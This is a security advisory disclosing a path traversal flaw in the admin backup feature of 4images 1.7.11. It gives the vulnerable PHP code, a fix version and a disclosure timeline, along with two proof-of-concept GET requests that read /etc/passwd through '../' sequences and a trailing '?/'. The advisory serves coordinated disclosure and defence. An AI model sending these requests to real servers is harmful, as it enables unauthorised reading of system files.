4images 1.7.11: Path Traversal
Date: 2015-12-02 16:25:061. Introduction
| Affected Product: | 4images 1.7.11 |
| Fixed in: | 1.7.12 |
| Fixed Version Link: | http://www.4homepages.de/download-4images |
| Vendor Website: | http://www.4homepages.de/ |
| Vulnerability Type: | Path Traversal |
| Remote Exploitable: | Yes |
| Reported to vendor: | 09/29/2015 |
| Disclosed to public: | 12/02/2015 |
| Release mode: | Coordinated release |
| CVE: | Requested, but not assigned |
| Credits | Tim Coen of curesec GmbH |
2. Vulnerability Description
CVSS
Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N
Description
When downloading or displaying a backup file, the file Parameter is vulnerable to directory traversal. This is the case because the get_basefile function contains a bug. When the passed path name ends with a slash, it will return the entire path instead of the file name.
By adding ?/ to the file name, an attacker can thus download or display arbitrary files.
Admin credentials are required to view or download backup files.
3. Proof of Concept
GET /4images/admin/backup.php?action=downloadbackup&file=../../../../../../etc/passwd?/ HTTP/1.1
GET /4images/admin/backup.php?action=showbackup&file=../../../../../../etc/passwd?/ HTTP/1.1
4. Code
/admin/bachup.php
if (isset($HTTP_GET_VARS['file']) || isset($HTTP_POST_VARS['file'])) {
$file = (isset($HTTP_GET_VARS['file'])) ? get_basefile(trim($HTTP_GET_VARS['file'])) : get_basefile(trim($HTTP_POST_VARS['file']));
}
else {
$file = "";
}
if ($action == "downloadbackup") {
$size = @filesize(ROOT_PATH.DATABASE_DIR."/".$file);
header("Content-type: application/x-unknown");
header("Content-length: $size\n");
header("Content-Disposition: attachment; filename=$file\n");
readfile(ROOT_PATH.DATABASE_DIR."/".$file);
exit;
}
/includes/functions.php
function get_basename($path) {
$path = str_replace("\\", "/", $path);
$name = substr(strrchr($path, "/"), 1);
return $name ? $name : $path;
}
function get_basefile($path) {
$basename = get_basename($path);
preg_match("#(.+)\?(.+)#", $basename, $regs);
return isset($regs[1]) ? $regs[1] : $basename;
}
5. Solution
To mitigate this issue please upgrade at least to version 1.7.12:
http://www.4homepages.de/download-4images
Please note that a newer version might already be available.
6. Report Timeline
| 09/29/2015 | Informed Vendor about Issue |
| 10/21/2015 | Reminded Vendor of Disclosure Date |
| 11/03/2015 | Vendor releases fix |
| 11/17/2015 | CVE Requested (no reply) |
| 12/02/2015 | Disclosed to public |